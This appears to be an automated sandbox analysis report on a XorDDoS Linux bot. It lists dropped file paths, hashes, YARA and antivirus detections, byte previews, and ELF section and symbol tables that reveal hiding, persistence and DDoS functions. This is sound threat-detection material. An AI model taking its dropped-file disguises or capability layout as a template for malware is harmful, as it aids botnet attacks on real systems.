                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wzulpfbuxk, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/ysrkbnorkl

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244496355005872
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AE:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91L
                                                                                                                                                MD5:4D2E235CEAD4F0439BC635F5A18F4BF4
                                                                                                                                                SHA1:21F184FF46CA2F4F3B4C6D9CE13925E713B04B7C
                                                                                                                                                SHA-256:447A7A0EDB034B40BA4DE2F932DCCEACD45ABCD9B40A24EDBD50C73088A15FE2
                                                                                                                                                SHA-512:407A355E40CA9C249356B5F7A1ECC0E133D28B61139161583C14F0D61680657018F1CD0E3EB97C3076AA92238F37FE90B67BC2D136451ACD98C767719C2A852C
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ysrkbnorkl, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ysrkbnorkl, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ysrkbnorkl, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/bin/zareoppgxh

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625911
                                                                                                                                                Entropy (8bit):6.244485552214403
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AI:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91v
                                                                                                                                                MD5:8BD739BBC978F1311F3459FAE05BBEFD
                                                                                                                                                SHA1:D9C316849B92D5F86F81699E179883EB29BB059F
                                                                                                                                                SHA-256:122A7329AAF142BCF138BA253CE7844FBC9E434F0200FC7B926F61092FB0A7D9
                                                                                                                                                SHA-512:314B63B898ABE37EA2E926D2FF605FC5F07E144F4546DD743749EC3E61CAE7F27B9037CE994092F94C9A93D2045D7CEEE85493AD8EEE0DDFDB6CE52FECB03A40
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zareoppgxh, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zareoppgxh, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zareoppgxh, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                /usr/lib/libudev.so

                                                                                                                                                Download File
                                                                                                                                                Process:/tmp/0Xorddos.o
                                                                                                                                                File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):625900
                                                                                                                                                Entropy (8bit):6.244464373397953
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AD:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91+
                                                                                                                                                MD5:DA818861F56900F552EB04C5E7D8C59D
                                                                                                                                                SHA1:4A414CCF923001621457E4BEAF2EC0E7B165F2AC
                                                                                                                                                SHA-256:D920DEC25946A86AEAFFD5A53CE8C3F05C9A7BAC44D5C71481F497DE430CB67E
                                                                                                                                                SHA-512:CFF03F07B80DFC30F48DC3D2B4CA1BA572D4CA6D784C4855BC2044058C5DEB5C89397C6CF3EAF9FDE8660605BC8C821A7EEA8A73C3F48D7994328C9EC92AE915
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security
                                                                                                                                                • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
                                                                                                                                                • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/lib/libudev.so, Author: Akamai CSIRT
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                Entropy (8bit):6.244464373397953
                                                                                                                                                TrID:
                                                                                                                                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                                                File name:0Xorddos.o
                                                                                                                                                File size:625900
                                                                                                                                                MD5:da818861f56900f552eb04c5e7d8c59d
                                                                                                                                                SHA1:4a414ccf923001621457e4beaf2ec0e7b165f2ac
                                                                                                                                                SHA256:d920dec25946a86aeaffd5a53ce8c3f05c9a7bac44d5c71481f497de430cb67e
                                                                                                                                                SHA512:cff03f07b80dfc30f48dc3d2b4ca1ba572d4ca6d784c4855bc2044058c5deb5c89397c6cf3eaf9fde8660605bc8c821a7eea8a73c3f48d7994328c9ec92ae915
                                                                                                                                                SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AD:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91+
                                                                                                                                                File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                                                                                                                Static ELF Info

                                                                                                                                                ELF header

                                                                                                                                                Class:ELF32
                                                                                                                                                Data:2's complement, little endian
                                                                                                                                                Version:1 (current)
                                                                                                                                                Machine:Intel 80386
                                                                                                                                                Version Number:0x1
                                                                                                                                                Type:EXEC (Executable file)
                                                                                                                                                OS/ABI:UNIX - System V
                                                                                                                                                ABI Version:0
                                                                                                                                                Entry Point Address:0x8048110
                                                                                                                                                Flags:0x0
                                                                                                                                                ELF Header Size:52
                                                                                                                                                Program Header Offset:52
                                                                                                                                                Program Header Size:32
                                                                                                                                                Number of Program Headers:5
                                                                                                                                                Section Header Offset:553480
                                                                                                                                                Section Header Size:40
                                                                                                                                                Number of Section Headers:28
                                                                                                                                                Header String Table Index:25

                                                                                                                                                Sections

                                                                                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                                NULL0x00x00x00x00x0000
                                                                                                                                                .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                                                                                .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                                                                                                .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                                                                                                                __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                                                                                                                __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                                                                                                                .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                                                                                                                .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                                                                                                                __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                                                                                                                __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                                                                                                                __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                                                                                                                .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                                                                                                                .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                                                                                                                .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                                                                                                                .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                                                                                                                .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                                                                                                                .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                                                                                                                .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                                                                                                                .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                                                                                                                .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                                                                                                                .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                                                                                                                .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                                                                                                                .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                                                                                                                __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                                                                                                                .commentPROGBITS0x00x86cc00x4220x00x0001
                                                                                                                                                .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                                                                                                                .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                                                                                                                .strtabSTRTAB0x00x90a280x82a30x00x0001

                                                                                                                                                Program Segments

                                                                                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                                LOAD0x00x80480000x80480000x8610b0x8610b3.33960x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                                                                                                LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e02.92410x6RW 0x1000.ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                                                                                NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                                                                                                TLS0x8610c0x80cf10c0x80cf10c0x140x401.61270x4R 0x4
                                                                                                                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                                                                                                                Symbols

                                                                                                                                                NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                                                                .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                                .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                                                                                                                .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                                                                                                                .symtab0x80481100SECTION<unknown>DEFAULT3
                                                                                                                                                .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                                                                                                                .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                                                                                                                .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                                                                                                                .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                                                                                                                .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                                                                                                                .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                                                                                                                .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                                                                                                                .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                                                                                                                .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                                                                                                                .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                                                                                                                .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                                                                                                                .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                                                                                                                .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                                                                                                                .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                                                                                                                .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                                                                                                                .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                                                                                                                .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                                                                                                                .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                                                                                                                .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                                                                                                                .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                                                                                                                .symtab0x00SECTION<unknown>DEFAULT24
                                                                                                                                                .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                                                                                                                .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                                                                                                                AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                                                                                                                CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                                                                                                                CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                                                                                                                CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                                                                                                                CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                                                                                                                CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                                                                                                                CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                                                                                                                DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                                                                                                                DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                                                                                                                DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                                                                                                                DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                                                                                                                DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                                                                                                                GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                                                                                                                GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                                                                                                                GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                                                                                                                GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                                                                                                                Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                                                                                                                HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
                                                                                                                                                HidePidPort.symtab0x804a6db114FUNC<unknown>DEFAULT3
                                                                                                                                                InstallSYS.symtab0x8048b8c336FUNC<unknown>DEFAULT3
                                                                                                                                                LinuxExec.symtab0x8048eed122FUNC<unknown>DEFAULT3
                                                                                                                                                LinuxExec_Argv.symtab0x8048f67135FUNC<unknown>DEFAULT3
                                                                                                                                                LinuxExec_Argv2.symtab0x8048fee148FUNC<unknown>DEFAULT3
                                                                                                                                                LogFacility.symtab0x80cfa0c4OBJECT<unknown>DEFAULT21
                                                                                                                                                LogFile.symtab0x80cfa084OBJECT<unknown>DEFAULT21
                                                                                                                                                LogMask.symtab0x80cfa004OBJECT<unknown>DEFAULT21
                                                                                                                                                LogStat.symtab0x80d50444OBJECT<unknown>DEFAULT22
                                                                                                                                                LogTag.symtab0x80d50484OBJECT<unknown>DEFAULT22
                                                                                                                                                LogType.symtab0x80cfa044OBJECT<unknown>DEFAULT21
                                                                                                                                                MAGIC_STR.symtab0x80d1f6033OBJECT<unknown>DEFAULT22
                                                                                                                                                MainList.symtab0x80d1fa0264OBJECT<unknown>DEFAULT22
                                                                                                                                                ReadWord.symtab0x804e150137FUNC<unknown>DEFAULT3
                                                                                                                                                SIZE_DNS_H.symtab0x80cf4a44OBJECT<unknown>DEFAULT21
                                                                                                                                                SIZE_DNS_T.symtab0x80cf4a84OBJECT<unknown>DEFAULT21
                                                                                                                                                SIZE_IP_H.symtab0x80cf4984OBJECT<unknown>DEFAULT21
                                                                                                                                                SIZE_PSEUDO_HDR.symtab0x80cf4ac4OBJECT<unknown>DEFAULT21
                                                                                                                                                SIZE_TCP_H.symtab0x80cf4a04OBJECT<unknown>DEFAULT21
                                                                                                                                                SIZE_UDP_H.symtab0x80cf49c4OBJECT<unknown>DEFAULT21
                                                                                                                                                SYS_BUF.symtab0x80cfce01OBJECT<unknown>DEFAULT22
                                                                                                                                                SyslogAddr.symtab0x80d5060110OBJECT<unknown>DEFAULT22
                                                                                                                                                THREAD_NUM.symtab0x80d61704OBJECT<unknown>DEFAULT22
                                                                                                                                                _Exit.symtab0x8067a2819FUNC<unknown>DEFAULT3
                                                                                                                                                _GLOBAL_OFFSET_TABLE_.symtab0x80cf16c0OBJECT<unknown>HIDDEN20
                                                                                                                                                _IO_2_1_stderr_.symtab0x80cf700152OBJECT<unknown>DEFAULT21
                                                                                                                                                _IO_2_1_stdin_.symtab0x80cf5c0152OBJECT<unknown>DEFAULT21
                                                                                                                                                _IO_2_1_stdout_.symtab0x80cf660152OBJECT<unknown>DEFAULT21
                                                                                                                                                _IO_adjust_column.symtab0x805c9b060FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_adjust_wcolumn.symtab0x808477063FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_cleanup.symtab0x805d310409FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_doallocate.symtab0x805de10143FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_finish.symtab0x805e310525FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_imbue.symtab0x805cac05FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_pbackfail.symtab0x805d900310FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_read.symtab0x805ca9010FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_seek.symtab0x805ca7015FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_seekoff.symtab0x805c90015FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_seekpos.symtab0x805c81059FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_setbuf.symtab0x805dd10244FUNC<unknown>DEFAULT3
                                                                                                                                                _IO_default_showmanyc.symtab0x805cab010FUNC<unknown>DEFAULT3
